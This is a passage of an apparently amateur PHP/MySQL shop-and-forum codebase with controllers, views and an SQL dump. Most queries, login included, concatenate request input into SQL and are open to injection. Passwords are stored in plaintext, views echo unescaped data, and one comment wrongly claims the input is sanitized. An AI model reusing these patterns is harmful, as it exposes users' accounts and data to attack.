$this->view->addData('forum_posts', $this->model->getForumPosts($args[1]));
$this->view->addData('forum_id', $args[1]);
$this->view->render('blog/forum');
break;
}
} else {
$this->view->addData('forums', $this->model->getForums());
$this->view->render('blog/index');
}
}
private function view_post($args) {
if (isset($args[2])) {
$this->view->addData('forum_post', $this->model->getForumPost($args[2]));
$this->view->render('blog/view_post');
} else {
$this->view->addData('forum_posts', $this->model->getForumPosts($args[1]));
$this->view->render('blog/forum');
}
}
private function post($args) {
if ($this->session->isLogged()) {
if (isset($args[2])) {
$this->view->addData('forum_id', $args[2]);
if (filter_has_var(INPUT_POST, 'post_name') && filter_has_var(INPUT_POST, 'post_content')) {
$post_id = $this->model->post($args[2], $this->session->getUserId(), filter_input(INPUT_POST, 'post_name', FILTER_SANITIZE_STRING), filter_input(INPUT_POST, 'post_content', FILTER_SANITIZE_STRING));
header('location: /parduotuve/blog/view_post/' . $post_id);
}
$this->view->render('blog/post');
} else {
header('location: /parduotuve/blog/');
}
} else {
header('location: /parduotuve/login');
}
}
}
<file_sep>/controllers/login.php
<?php
class Login extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (filter_has_var(INPUT_POST, 'username') && filter_has_var(INPUT_POST, 'password')) {
$user_info = $this->model->login(filter_input(INPUT_POST, 'username', FILTER_SANITIZE_STRING), filter_input(INPUT_POST, 'password', FILTER_SANITIZE_STRING));
if ($user_info) {
$this->session->login($user_info);
header('location: /parduotuve/');
} else {
$this->view->addData('errors', ['Wrong username / password']);
$this->view->render('login/index');
}
} else {
if (!$this->session->isLogged()) {
$this->view->render('login/index');
} else {
header('location: /parduotuve/');
}
}
}
}
<file_sep>/controllers/index.php
<?php
class Index extends Controller {
function __construct($args = NULL) {
parent::__construct();
$this->view->addData('products', $this->model->getProducts());
$this->view->render('index/index');
}
}
<file_sep>/models/loginModel.php
<?php
class loginModel extends Model {
function __construct() {
parent::__construct();
}
function login($username, $password) {
$result = mysqli_query($this->db, "SELECT * FROM users WHERE username = '" . $username . "' AND password = '" . $password . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return mysqli_fetch_array($result);
} else {
return FALSE;
}
} else {
return mysqli_error($this->db);
}
}
}
<file_sep>/views/blog/view_post.php
<?php if (isset($this->data['forum_post']) && count($this->data['forum_post']) > 0) { ?>
<div class="position-relative col-xl-8 col-lg-10 col-md-10 col-sm-12 mx-auto my-5 py-5 shadow">
<h1><?php echo $this->data['forum_post']['name']; ?></h1>
<p class="font-weight-light"><?php echo date('M j, Y - G:i', strtotime($this->data['forum_post']['date'])); ?> by <a href="/parduotuve/profile/<?php echo $this->data['forum_post']['user']; ?>"><?php echo $this->data['forum_post']['user']; ?></a></p>
<p class=""><?php echo $this->data['forum_post']['message']; ?></p>
<a href="/parduotuve/blog/<?php echo $this->data['forum_post']['forum_id']; ?>" class="position-absolute m-1 forum-back"><button type="button" class="btn btn-sm btn-dark">← Back</button></a>
</div>
<?php } else { ?>
<h1 class="text-center my-5">Post not found</h1>
<?php } ?>
<file_sep>/views/blog/index.php
<h1 class="text-center py-2">Forum</h1>
<div class="col-xl-8 col-lg-10 col-md-12 col-sm-12 mx-auto mb-5 border shadow">
<?php if (isset($this->data['forums']) && count($this->data['forums']) > 0) { ?>
<div class="row py-2 border-bottom">
<div class="col-10 font-weight-bold">Forum</div>
<div class="col-2 font-weight-bold text-center">Posts</div>
</div>
<div class="row my-2">
<?php foreach ($this->data['forums'] as $key => $forum) { ?>
<div class="col-10"><a href="/parduotuve/blog/<?php echo $forum['id']; ?>"><?php echo $forum['name']; ?></a></div>
<div class="col-2 text-center"><?php echo $forum['posts']; ?></div>
<?php } ?>
</div>
<?php } else { ?>
<h3 class="text-center font-weight-bold my-5">There are 0 forum categories</h3>
<?php } ?>
</div><file_sep>/models/productModel.php
<?php
class ProductModel extends Model {
function __construct() {
parent::__construct();
}
function getProduct($product_id) {
$result = mysqli_query($this->db, "SELECT * FROM products WHERE id = '" . $product_id . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return mysqli_fetch_array($result, MYSQLI_ASSOC);
} else {
return array();
}
} else {
return mysqli_error($this->db);
}
}
}
<file_sep>/controllers/about.php
<?php
class About extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (isset($args[1])) {
switch ($args[1]) {
default:
$this->view->render('error/index');
break;
}
} else {
$this->view->render('about/index');
}
}
}
<file_sep>/TODO.txt
// Prevent access to core files
// Add config file
add password hashing
add validation to everything
prepare admin page
implement reply/edit to forum?<file_sep>/index.php
<?php
require_once './core/init.php';
?><file_sep>/controllers/register.php
<?php
class Register extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (!$this->session->isLogged()) {
if ($this->isRegisterRequest()) {
$isValid = $this->isRegisterDataValid();
if ($isValid === TRUE) {
$register_result = $this->model->register(filter_input(INPUT_POST, 'username', FILTER_SANITIZE_STRING), filter_input(INPUT_POST, 'email', FILTER_SANITIZE_STRING), filter_input(INPUT_POST, 'password', FILTER_SANITIZE_STRING));
if ($register_result) {
header('location: /parduotuve/');
} else {
$this->view->render('register/index', 'Something went wrong...');
}
} else {
$this->view->addData('errors', $isValid);
$this->view->render('register/index');
}
} else {
$this->view->render('register/index');
}
} else {
header('location: /parduotuve/');
}
}
function isRegisterRequest() {
if (filter_has_var(INPUT_POST, 'username') && filter_has_var(INPUT_POST, 'email') && filter_has_var(INPUT_POST, 'password') && filter_has_var(INPUT_POST, 'password2')) {
return TRUE;
} else {
return FALSE;
}
}
function isRegisterDataValid() {
$errors = array();
if (!$this->model->isUsernameUnique(filter_input(INPUT_POST, 'username', FILTER_SANITIZE_STRING))) {
array_push($errors, 'Username already exists!');
}
if (filter_input(INPUT_POST, 'password', FILTER_SANITIZE_STRING) != filter_input(INPUT_POST, 'password2', FILTER_SANITIZE_STRING)) {
            array_push($errors, 'Passwords do not match!');
}
return count($errors) > 0 ? $errors : TRUE;
}
}
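// --- Editor's sketch (illustrative only) ---
// The project TODO asks to "add validation to everything"; isRegisterDataValid() above
// only checks username uniqueness and that the two passwords match. A minimal extension
// could also validate the e-mail format and a minimum password length. The function name
// extraRegistrationErrors() is hypothetical and is not called anywhere in this codebase.
function extraRegistrationErrors($email, $password) {
    $errors = array();
    // FILTER_VALIDATE_EMAIL returns FALSE when the address is not syntactically valid
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === FALSE) {
        $errors[] = 'Invalid e-mail address!';
    }
    if (strlen($password) < 8) {
        $errors[] = 'Password must be at least 8 characters long!';
    }
    return $errors;
}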
<file_sep>/views/index/index.php
<div class="row m-0">
<aside class="col-lg-3 col-xl-3 col-md-12 col-sm-12 border-left border-right mb-1">
<?php include_once 'views/menu_categories.php'; ?>
</aside>
<div class="col-lg-9 col-md-12 col-sm-12 row p-0 m-0 d-flex justify-content-start">
<?php if (isset($this->data['products'])) { ?>
<?php foreach ($this->data['products'] as $key => $product) { ?>
<div class="card col-xl-4 col-lg-6 col-md-6 col-sm-12 p-0 my-1">
<a href="/parduotuve/product/<?php echo $product['id']; ?>">
<img src="/parduotuve/img/products/<?php echo isset($product['image']) ? $product['image'] : 'no-image.png'; ?>" class="card-img-top p-4" alt="">
</a>
<?php if ($product['is_new']) { ?>
<div class="new">New</div>
<?php } ?>
<div class="card-body">
<h5 class="card-title text-center"><a href="/parduotuve/product/<?php echo $product['id']; ?>"><?php echo $product['name']; ?></a></h5>
<p class="card-text text-center"><?php echo '$ ' . $product['price']; ?></p>
<?php if ($product['is_recommended']) { ?>
<p class="card-text text-center recommended">Recommended</p>
<?php } ?>
<form action="/parduotuve/cart" method="post">
<button type="submit" class="btn btn-primary btn-lg btn-block" name="cart_add" value="<?php echo $product['id']; ?>">Add to cart</button>
</form>
</div>
</div>
<?php } ?>
<?php } else { ?>
<h3 class="mx-auto my-5">There are no products</h3>
<?php } ?>
</div>
</div><file_sep>/controllers/cart.php
<?php
class Cart extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (isset($args[1])) {
switch ($args[1]) {
default:
$this->view->render('error/index');
break;
}
} else {
if (filter_has_var(INPUT_POST, 'cart_add')) {
$this->cartAdd();
} else if (filter_has_var(INPUT_POST, 'cart_remove')) {
$this->cartRemove();
}
$this->view->addData('products', $this->session->getUserCart());
$this->view->render('cart/index');
}
}
function cartAdd() {
$product_id = intval(filter_input(INPUT_POST, 'cart_add'));
$amount = filter_has_var(INPUT_POST, 'amount') ? intval(filter_input(INPUT_POST, 'amount')) : 1;
$errors = array();
if ($product_id == 0) {
array_push($errors, 'Invalid product');
} elseif (!$this->model->doesProductExist($product_id)) {
array_push($errors, 'Product does not exist');
}
if ($amount == 0) {
array_push($errors, 'Incorrect amount');
}
if (count($this->session->getUserCart()) >= 10) {
array_push($errors, "Max order amount reached");
}
if (count($errors) == 0) {
$this->session->cartAddProduct($this->model->getProduct($product_id), $amount);
$this->view->addData('info', array('Product added'));
} else {
$this->view->addData('errors', $errors);
}
}
function cartRemove() {
$product_id = intval(filter_input(INPUT_POST, 'cart_remove'));
$errors = array();
if (count($errors) == 0) {
$isRemoved = $this->session->cartRemoveProduct($product_id);
if ($isRemoved) {
$this->view->addData('info', array('Product removed'));
} else {
array_push($errors, "ERROR");
$this->view->addData('errors', $errors);
}
} else {
$this->view->addData('errors', $errors);
}
}
}
<file_sep>/core/model.php
<?php
class Model {
protected $db;
function __construct() {
$this->db = mysqli_connect('localhost', 'root', '', 'parduotuve');
if (mysqli_connect_errno()) {
printf("Database connection error: %s\n", mysqli_connect_error());
die();
} else {
mysqli_set_charset($this->db, 'utf8');
}
}
function handleError() {
if (mysqli_error($this->db)) {
print_r("DB ERROR: %s\n", mysqli_errno($this->db));
}
}
function resultToArray($result) {
$list = array();
while ($i = mysqli_fetch_array($result, MYSQLI_ASSOC)) {
array_push($list, $i);
}
return $list;
}
function getUserInfo($user_id) {
$result = mysqli_query($this->db, "SELECT * FROM users WHERE id = '" . $user_id . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return mysqli_fetch_array($result, MYSQLI_ASSOC);
} else {
return array();
}
} else {
$this->handleError();
}
}
function getCategories() {
$result = mysqli_query($this->db, "SELECT * FROM categories");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return $this->resultToArray($result);
} else {
return array();
}
} else {
$this->handleError();
}
}
function getProducts($category_id = NULL) {
$result = mysqli_query($this->db, "SELECT products.*, categories.name as 'category', categories.id as 'category_id' FROM products LEFT JOIN categories ON categories.id = products.category_id" . ($category_id != NULL ? " WHERE category_id = '" . $category_id . "' LIMIT 1" : ""));
if ($result) {
if (mysqli_num_rows($result) > 0) {
return $this->resultToArray($result);
} else {
return array();
}
} else {
$this->handleError();
}
}
}
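// --- Editor's sketch (illustrative only) ---
// The model queries above (and the login/register models) build SQL by concatenating
// raw request values, which is open to SQL injection; the TODO already notes
// "add validation to everything". A safer pattern is a prepared statement.
// fetchUserById() is a hypothetical stand-alone variant of getUserInfo(), not used
// anywhere in this codebase, and it assumes the mysqlnd driver so that
// mysqli_stmt_get_result() is available.
function fetchUserById($db, $user_id) {
    $stmt = mysqli_prepare($db, "SELECT * FROM users WHERE id = ?");
    if ($stmt === FALSE) {
        return array();
    }
    mysqli_stmt_bind_param($stmt, 'i', $user_id); // 'i' binds the value as an integer
    mysqli_stmt_execute($stmt);
    $result = mysqli_stmt_get_result($stmt);
    $row = $result ? mysqli_fetch_array($result, MYSQLI_ASSOC) : NULL;
    mysqli_stmt_close($stmt);
    return $row ? $row : array();
}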
<file_sep>/controllers/product.php
<?php
class Product extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (isset($args[1])) {
$this->view->addData('product', $this->model->getProduct($args[1]));
$this->view->render('product/index');
} else {
header('location: /parduotuve/catalog');
}
}
}
<file_sep>/core/controller.php
<?php
class Controller {
protected $model;
protected $view;
protected $session;
function __construct() {
// Instantiating Model class
$this->loadModel(get_called_class());
// Instantiating Session class
$this->session = new Session();
// Instantiating View class
$this->view = new View($this->session);
$this->view->addData('categories', $this->model->getCategories());
}
function loadModel($name) {
// Path to model
$path = 'models/' . $name . 'Model.php';
// Checking if model file exists
if (file_exists($path)) {
// Including model file
require_once $path;
// Checking if required model class exists
if (class_exists($name . 'Model')) {
// Instantiating model class
$this->model = $name . 'Model';
$this->model = new $this->model($this->session);
return TRUE;
} else {
$this->model = new Model();
// No such model class
return FALSE;
}
} else {
$this->model = new Model();
// No such model file
return FALSE;
}
}
}
<file_sep>/core/init.php
<?php
// Core classes
require_once 'core.php';
require_once 'controller.php';
require_once 'model.php';
require_once 'view.php';
require_once 'Session.php';
// Start
$core = new Core();
<file_sep>/controllers/profile.php
<?php
class Profile extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (isset($args[1])) {
switch ($args[1]) {
case 'edit':
$this->editProfile();
break;
case 'edit_password':
$this->editPassword();
break;
default:
$this->view->render('error/index');
break;
}
} else {
if ($this->session->isLogged()) {
if (filter_has_var(INPUT_POST, 'edit_profile')) {
$email = filter_input(INPUT_POST, 'email');
$password = filter_input(INPUT_POST, 'password');
if ($this->model->isPasswordCorrect($this->session->getUserId(), $password)) {
$this->model->updateUserInfo($this->session->getUserId(), $email);
$this->session->updateUserInfo($this->model->getUserInfo($this->session->getUserId()));
$this->view->addData('info', array('Profile updated'));
} else {
$this->view->addData('errors', array('Incorrect password'));
}
} else if (filter_has_var(INPUT_POST, 'edit_password')) {
$password_old = filter_input(INPUT_POST, '<PASSWORD>');
$password_new = filter_input(INPUT_POST, '<PASSWORD>');
$password_new_confirm = filter_input(INPUT_POST, 'password_new_confirm');
if ($this->model->isPasswordCorrect($this->session->getUserId(), $password_old) && $password_new === $password_new_confirm) {
$this->model->updateUserPassword($this->session->getUserId(), $password_new);
$this->view->addData('info', array('Password updated'));
} else {
$this->view->addData('errors', array('something went wrong...'));
}
}
$this->view->render('profile/index');
} else {
header('location: /parduotuve/login');
}
}
}
function editProfile() {
if ($this->session->isLogged()) {
$this->view->render('profile/edit');
} else {
header('location: /parduotuve/login');
}
}
function editPassword() {
if ($this->session->isLogged()) {
$this->view->render('profile/edit_password');
} else {
header('location: /parduotuve/login');
}
}
}
<file_sep>/views/profile/index.php
<div>
<h1 class="text-center py-2">Profile</h1>
<?php if (isset($this->data['errors']) && is_array($this->data['errors'])) { ?>
<?php foreach ($this->data['errors'] as $key => $error) { ?>
<div class="alert alert-danger col-xl-6 col-lg-8 col-md-10 col-sm-10 mx-auto text-center" role="alert">
<?php echo $error; ?>
</div>
<?php } ?>
<?php } elseif (isset($this->data['info']) && is_array($this->data['info'])) {?>
<?php foreach ($this->data['info'] as $key => $info) { ?>
<div class="alert alert-success col-xl-6 col-lg-8 col-md-10 col-sm-10 mx-auto text-center" role="alert">
<?php echo $info; ?>
</div>
<?php } ?>
<?php } ?>
<div class="col-xl-6 col-lg-8 col-md-10 col-sm-10 mx-auto mb-5 py-2 shadow d-flex flex-column">
<div class="row border-bottom my-1 py-2">
<h4 class="my-auto mr-3 col-3">Username:</h4>
<h5 class="my-auto col-8"><?php echo $this->session->getUserName(); ?></h5>
</div>
<div class="row border-bottom my-1 py-2">
<div class="my-auto mr-3 col-3">Email: </div>
<div class="my-auto"><?php echo $this->session->getUserEmail(); ?></div>
</div>
<div class="row border-bottom my-1 py-2">
<div class="my-auto mr-3 col-3">Registered: </div>
<div class="my-auto"><?php echo $this->session->getUserRegisterDate(); ?></div>
</div>
<div class="row mt-2 d-flex ">
<a href="/parduotuve/profile/edit_password" class="mx-auto"><button type="button" class="btn btn-primary">Change password</button></a>
<a href="/parduotuve/profile/edit" class="mx-auto"><button type="button" class="btn btn-primary">Edit profile</button></a>
</div>
</div>
</div><file_sep>/views/menu_categories.php
<ul class="nav nav-pills flex-column my-2">
<?php if (isset($this->data['categories'])) { ?>
<h3 class="text-center">Catalogs</h3>
<?php foreach ($this->data['categories'] as $key => $category) { ?>
<li class="nav-item">
<a class="nav-link text-break" href="/parduotuve/catalog/<?php echo mb_strtolower($category['id']); ?>"><?php echo $category['name']; ?></a>
</li>
<?php } ?>
<?php } else { ?>
<h3 class="text-center my-5">No catalogs</h3>
<?php } ?>
</ul>
<file_sep>/parduotuve.sql
-- phpMyAdmin SQL Dump
-- version 4.8.5
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1
-- Generation Time: May 03, 2019 at 12:48 PM
-- Server version: 10.1.38-MariaDB
-- PHP Version: 7.3.4
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `parduotuve`
--
-- --------------------------------------------------------
--
-- Table structure for table `categories`
--
CREATE TABLE `categories` (
`id` int(11) NOT NULL,
`name` varchar(255) CHARACTER SET utf8 COLLATE utf8_lithuanian_ci NOT NULL,
`image` varchar(255) CHARACTER SET utf8 COLLATE utf8_lithuanian_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `categories`
--
INSERT INTO `categories` (`id`, `name`, `image`) VALUES
(1, 'Marškiniai', NULL),
(2, 'Kelnės', NULL),
(3, 'Batai', NULL),
(4, 'Kepures', NULL);
-- --------------------------------------------------------
--
-- Table structure for table `forums`
--
CREATE TABLE `forums` (
`id` int(11) NOT NULL,
`name` varchar(255) COLLATE utf8_lithuanian_ci NOT NULL,
`description` varchar(255) COLLATE utf8_lithuanian_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_lithuanian_ci;
--
-- Dumping data for table `forums`
--
INSERT INTO `forums` (`id`, `name`, `description`) VALUES
(1, 'General', '');
-- --------------------------------------------------------
--
-- Table structure for table `forum_posts`
--
CREATE TABLE `forum_posts` (
`id` int(11) NOT NULL,
`forum` int(11) NOT NULL,
`user` int(11) NOT NULL,
`name` varchar(255) COLLATE utf8_lithuanian_ci NOT NULL,
`message` text COLLATE utf8_lithuanian_ci NOT NULL,
`date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_lithuanian_ci;
--
-- Dumping data for table `forum_posts`
--
INSERT INTO `forum_posts` (`id`, `forum`, `user`, `name`, `message`, `date`) VALUES
(1, 1, 1, 'Testing...', 'Hello World!', '2019-04-27 23:02:18'),
(2, 1, 2, '321 <?php echo 123; ?>', 'Hi\r\n<br>\r\n<br>\r\n<br>\r\n<br>', '2019-04-28 00:16:11');
-- --------------------------------------------------------
--
-- Table structure for table `products`
--
CREATE TABLE `products` (
`id` int(11) NOT NULL,
`name` varchar(255) NOT NULL,
`category_id` int(11) NOT NULL,
`code` int(11) NOT NULL,
`price` float NOT NULL,
`availability` int(11) NOT NULL,
`brand` varchar(255) NOT NULL,
`image` varchar(255) NOT NULL,
`description` text NOT NULL,
`is_new` tinyint(1) NOT NULL DEFAULT '0',
`is_recommended` tinyint(1) NOT NULL DEFAULT '0',
`status` tinyint(1) NOT NULL DEFAULT '1'
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `products`
--
INSERT INTO `products` (`id`, `name`, `category_id`, `code`, `price`, `availability`, `brand`, `image`, `description`, `is_new`, `is_recommended`, `status`) VALUES
(1, 'Timberland', 3, 123456789, 99.9, 100, 'Timberland', 'timberland-black.jpg', '', 1, 1, 1),
(2, 'AXC Black', 2, 321456987, 0.99, 1337, 'Lmao', 'axc-black.jpg', 'Good pants?', 1, 0, 1),
(4, 'AMI', 1, 456789123, 4.99, 100, 'AMI', 'ami-mens-plain-white-shirt-regular-fit-poplin-formal-shirt.jpg', 'Mens Plain White Shirt, Regular Fit Poplin Formal Shirt', 0, 1, 1);
-- --------------------------------------------------------
--
-- Table structure for table `users`
--
CREATE TABLE `users` (
`id` int(11) NOT NULL,
`username` varchar(255) NOT NULL,
`email` varchar(255) NOT NULL,
`password` varchar(255) NOT NULL,
`admin` tinyint(1) NOT NULL DEFAULT '0',
`register_date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `users`
--
INSERT INTO `users` (`id`, `username`, `email`, `password`, `admin`, `register_date`) VALUES
(1, '123', '<EMAIL>', '123', 1, '2019-04-15 20:27:26'),
(2, '321', '', '321', 0, '2019-04-16 06:04:23');
-- --------------------------------------------------------
--
-- Table structure for table `user_cart_products`
--
CREATE TABLE `user_cart_products` (
`id` int(11) NOT NULL,
`user` int(11) NOT NULL,
`product` int(11) NOT NULL,
`amount` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_lithuanian_ci;
--
-- Indexes for dumped tables
--
--
-- Indexes for table `categories`
--
ALTER TABLE `categories`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `forums`
--
ALTER TABLE `forums`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `forum_posts`
--
ALTER TABLE `forum_posts`
ADD PRIMARY KEY (`id`),
ADD KEY `fk_user_users_id` (`user`),
ADD KEY `fk_forum_forums_id` (`forum`);
--
-- Indexes for table `products`
--
ALTER TABLE `products`
ADD PRIMARY KEY (`id`),
ADD KEY `fk_category_id_categories_id` (`category_id`);
--
-- Indexes for table `users`
--
ALTER TABLE `users`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `user_cart_products`
--
ALTER TABLE `user_cart_products`
ADD PRIMARY KEY (`id`),
ADD KEY `fk_user_user_id` (`user`),
ADD KEY `fk_product_products_id` (`product`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `categories`
--
ALTER TABLE `categories`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT for table `forums`
--
ALTER TABLE `forums`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;
--
-- AUTO_INCREMENT for table `forum_posts`
--
ALTER TABLE `forum_posts`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT for table `products`
--
ALTER TABLE `products`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;
--
-- AUTO_INCREMENT for table `user_cart_products`
--
ALTER TABLE `user_cart_products`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;
--
-- Constraints for dumped tables
--
--
-- Constraints for table `forum_posts`
--
ALTER TABLE `forum_posts`
ADD CONSTRAINT `fk_forum_forum_id` FOREIGN KEY (`forum`) REFERENCES `forums` (`id`),
ADD CONSTRAINT `fk_user_users_id` FOREIGN KEY (`user`) REFERENCES `users` (`id`);
--
-- Constraints for table `products`
--
ALTER TABLE `products`
ADD CONSTRAINT `fk_category_id_categories_id` FOREIGN KEY (`category_id`) REFERENCES `categories` (`id`);
--
-- Constraints for table `user_cart_products`
--
ALTER TABLE `user_cart_products`
ADD CONSTRAINT `fk_product_products_id` FOREIGN KEY (`product`) REFERENCES `products` (`id`),
ADD CONSTRAINT `fk_user_user_id` FOREIGN KEY (`user`) REFERENCES `users` (`id`);
COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep>/models/blogModel.php
<?php
class blogModel extends Model {
function __construct() {
parent::__construct();
}
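// Note: ids and user-supplied values are concatenated straight into the SQL strings below; callers are assumed to pass already-sanitized input.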
function forumExists($forum_id) {
$result = mysqli_query($this->db, "SELECT * FROM forums WHERE id = '" . $forum_id . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return TRUE;
} else {
return FALSE;
}
} else {
return mysqli_error($this->db);
}
}
function getForums() {
$result = mysqli_query($this->db, "SELECT forums.*, count(forum_posts.id) as 'posts' FROM forums LEFT JOIN forum_posts ON forum_posts.forum = forums.id GROUP BY forums.id");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return $this->resultToArray($result);
} else {
return array();
}
} else {
return mysqli_error($this->db);
}
}
function getForumPosts($forum_id) {
if ($this->forumExists($forum_id)) {
$result = mysqli_query($this->db, "SELECT forum_posts.id, forums.name AS 'forum', users.username, forum_posts.name, forum_posts.date FROM forum_posts LEFT JOIN users ON users.id = forum_posts.user LEFT JOIN forums ON forums.id = forum_posts.forum WHERE forums.id = '" . $forum_id . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return $this->resultToArray($result);
} else {
return array();
}
} else {
return mysqli_error($this->db);
}
} else {
return FALSE;
}
}
function getForumPost($post_id) {
$result = mysqli_query($this->db, "SELECT forum_posts.*, users.username as 'user', forums.name as 'forum', forums.id as 'forum_id' FROM forum_posts LEFT JOIN users ON users.id = forum_posts.user LEFT JOIN forums ON forums.id = forum_posts.forum WHERE forum_posts.id = '" . $post_id . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return filter_var_array(mysqli_fetch_array($result, MYSQLI_ASSOC), FILTER_SANITIZE_STRING);
} else {
return array();
}
} else {
return mysqli_error($this->db);
}
}
function post($forum_id, $user_id, $name, $content) {
if ($this->forumExists($forum_id)) {
$result = mysqli_query($this->db, "INSERT INTO forum_posts (forum, user, name, message) VALUES ('" . $forum_id . "', '" . $user_id . "', '" . $name . "', '" . $content . "')");
if ($result) {
return mysqli_insert_id($this->db);
} else {
return mysqli_error($this->db);
}
} else {
return ["Forum not found"];
}
}
}
<file_sep>/controllers/logout.php
<?php
class Logout extends Controller {
function __construct($args = NULL) {
parent::__construct();
if ($this->session->isLogged()) {
$this->session->logout();
}
header('location: /parduotuve/');
}
}
<file_sep>/views/blog/forum.php
<?php if (isset($this->data['forum_posts']) && $this->data['forum_posts'] !== FALSE) { ?>
<?php if (count($this->data['forum_posts']) > 0) { ?>
<h1 class="text-center py-2"><?php echo $this->data['forum_posts'][0]['forum']; ?></h1>
<div class="position-relative col-xl-8 col-lg-10 col-md-12 col-sm-12 mx-auto mb-5 border shadow">
<div class="row py-2 border-bottom">
<div class="col-10 font-weight-bold">Post</div>
<div class="col-2 font-weight-bold text-center">Posted by</div>
</div>
<div class="pb-5">
<?php foreach ($this->data['forum_posts'] as $key => $forum_post) { ?>
<div class="row py-2">
<div class="col-10"><a href="/parduotuve/blog/view_post/<?php echo mb_strtolower($forum_post['id']); ?>"><?php echo $forum_post['name']; ?></a></div>
<div class="col-2 text-center"><?php echo $forum_post['username']; ?></div>
</div>
<?php } ?>
<a href="/parduotuve/blog/" class="position-absolute forum-back"><button type="button" class="btn btn-sm btn-dark border">← Back</button></a>
<a href="/parduotuve/blog/post/<?php echo $this->data['forum_id'] ?>" class="position-absolute forum-post"><button type="button" class="btn btn-sm btn-primary border">Post →</button></a>
<?php } else { ?>
<div class="col-xl-8 col-lg-10 col-md-12 col-sm-12 mx-auto my-5 py-3 shadow text-center">
<h1 class="text-center font-weight-bold">This forum is empty</h1>
<a href="/parduotuve/blog/post/<?php echo $this->data['forum_id'] ?>" class="forum-post d-inline-block mt-3"><button type="button" class="btn btn-lg btn-success border">Make a first post</button></a>
</div>
<?php } ?>
<?php } else { ?>
<div class="my-5 text-center">
<h1 class="font-weight-bold">No such forum</h1>
<a href="/parduotuve/blog/" class="d-inline-block mt-3"><button type="button" class="btn btn-lg btn-primary border">Go back</button></a>
</div>
<?php } ?>
<file_sep>/views/profile/edit.php
<div>
<h1 class="text-center py-2">Edit profile</h1>
<div class="col-xl-6 col-lg-8 col-md-10 col-sm-10 mx-auto mb-5 py-2 shadow d-flex flex-column">
<form action="/parduotuve/profile" method="post">
<div class="row border-bottom my-1 py-1">
<h4 class="my-auto mr-3 col-3">Username:</h4>
<h5 class="my-auto text-muted col-8"><?php echo $_SESSION['user_info']['username'] ?></h5>
</div>
<div class="row border-bottom my-1 py-1">
<div class="my-auto mr-3 col-3">Email: </div>
<input type="email" class="form-control col-8 my-auto" name="email" value="<?php echo $_SESSION['user_info']['email'] ?>" placeholder="Email">
</div>
<div class="row border-bottom my-1 py-1">
<div class="my-auto mr-3 col-3">Password: </div>
<input type="<PASSWORD>" class="form-control col-8 my-auto" name="password" placeholder="<PASSWORD>" required>
</div>
<div class="mt-3 pb-5">
<a href="/parduotuve/profile"><button type="button" class="btn btn-dark float-left">Go back</button></a>
<button type="submit" class="btn btn-primary float-right" name="edit_profile">Confirm</button>
</div>
</form>
</div>
</div><file_sep>/views/register/index.php
<div class="col-xl-5 col-lg-6 col-md-8 col-sm-12 mx-auto m-4">
<?php if (isset($this->data['errors']) && is_array($this->data['errors'])) { ?>
<?php foreach ($this->data['errors'] as $key => $error) { ?>
<div class="alert alert-danger" role="alert">
<?php echo $error; ?>
</div>
<?php } ?>
<?php } ?>
<h1 class="display-3 text-center mb-3">Register</h1>
<form action="register" method="post">
<div class="input-group my-2">
<div class="input-group-prepend">
<div class="input-group-text"><i class="fas fa-user"></i></div>
</div>
<input type="text" name="username" class="form-control" placeholder="Username" required>
</div>
<div class="input-group my-2">
<div class="input-group-prepend">
<div class="input-group-text"><i class="fas fa-envelope"></i></div>
</div>
<input type="email" name="email" class="form-control" placeholder="Email" required>
</div>
<div class="input-group my-2">
<div class="input-group-prepend">
